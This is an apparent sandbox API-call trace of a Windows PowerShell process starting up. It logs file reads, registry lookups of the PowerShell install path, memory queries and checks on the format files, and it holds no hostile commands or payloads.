	[0345.021] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.021] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.021] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.024] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.024] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.024] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.025] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.025] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.025] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.025] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.026] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1000, lpOverlapped=0x0) returned 1
	[0345.026] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x1b4, lpOverlapped=0x0) returned 1
	[0345.026] ReadFile (in: hFile=0x328, lpBuffer=0x2d89ec8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad468, lpOverlapped=0x0 | out: lpBuffer=0x2d89ec8*, lpNumberOfBytesRead=0xad468*=0x0, lpOverlapped=0x0) returned 1
	[0345.026] CloseHandle (hObject=0x328) returned 1
	[0345.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.026] SetErrorMode (uMode=0x1) returned 0x1
	[0345.027] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad3e0 | out: lpFileInformation=0xad3e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0345.027] SetErrorMode (uMode=0x1) returned 0x1
	[0345.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4c8 | out: phkResult=0xad4c8*=0x328) returned 0x0
	[0345.027] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad44c, lpData=0x0, lpcbData=0xad448*=0x0 | out: lpType=0xad44c*=0x1, lpData=0x0, lpcbData=0xad448*=0x56) returned 0x0
	[0345.027] CoTaskMemAlloc (cb=0x5a) returned 0x254d80
	[0345.027] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad41c, lpData=0x254d80, lpcbData=0xad418*=0x56 | out: lpType=0xad41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad418*=0x56) returned 0x0
	[0345.027] CoTaskMemFree (pv=0x254d80) 
	[0345.028] RegCloseKey (hKey=0x328) returned 0x0
	[0345.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xacfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0345.572] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.581] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.582] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.582] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.582] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.583] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.583] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.585] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.881] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.881] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.881] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.882] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.882] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.882] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.882] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.882] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.887] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.893] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.893] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.893] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.894] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.894] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.894] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.895] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.895] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.895] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.895] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.895] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.896] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.896] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.898] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.899] VirtualQuery (in: lpAddress=0xac1c0, lpBuffer=0xad080, dwLength=0x30 | out: lpBuffer=0xad080*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.900] VirtualQuery (in: lpAddress=0xac1c0, lpBuffer=0xad080, dwLength=0x30 | out: lpBuffer=0xad080*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.900] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.900] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.204] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.205] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.205] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.208] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0346.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.208] CoTaskMemFree (pv=0x1b8da0) 
	[0346.209] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.213] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.213] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.213] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.213] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.214] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.214] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.215] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.216] VirtualQuery (in: lpAddress=0xac1b0, lpBuffer=0xad070, dwLength=0x30 | out: lpBuffer=0xad070*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0346.217] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad668 | out: phkResult=0xad668*=0x328) returned 0x0
	[0346.217] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad67c, lpData=0x0, lpcbData=0xad678*=0x0 | out: lpType=0xad67c*=0x1, lpData=0x0, lpcbData=0xad678*=0x74) returned 0x0
	[0346.217] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad5ec, lpData=0x0, lpcbData=0xad5e8*=0x0 | out: lpType=0xad5ec*=0x1, lpData=0x0, lpcbData=0xad5e8*=0x74) returned 0x0
	[0346.217] CoTaskMemAlloc (cb=0x78) returned 0x2011a0
	[0346.217] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0xad5bc, lpData=0x2011a0, lpcbData=0xad5b8*=0x74 | out: lpType=0xad5bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xad5b8*=0x74) returned 0x0
	[0346.217] CoTaskMemFree (pv=0x2011a0) 
	[0346.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0346.217] SetErrorMode (uMode=0x1) returned 0x1
	[0346.217] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0346.218] SetErrorMode (uMode=0x1) returned 0x1
	[0346.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.218] SetErrorMode (uMode=0x1) returned 0x1
	[0346.218] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0346.218] SetErrorMode (uMode=0x1) returned 0x1
	[0346.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0346.218] SetErrorMode (uMode=0x1) returned 0x1
	[0346.218] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0346.218] SetErrorMode (uMode=0x1) returned 0x1
	[0346.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.219] SetErrorMode (uMode=0x1) returned 0x1
	[0346.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad540 | out: lpFileInformation=0xad540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0346.219] SetErrorMode (uMode=0x1) returned 0x1
	[0346.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0346.219] SetErrorMode (uMode=0x1) returned 0x1
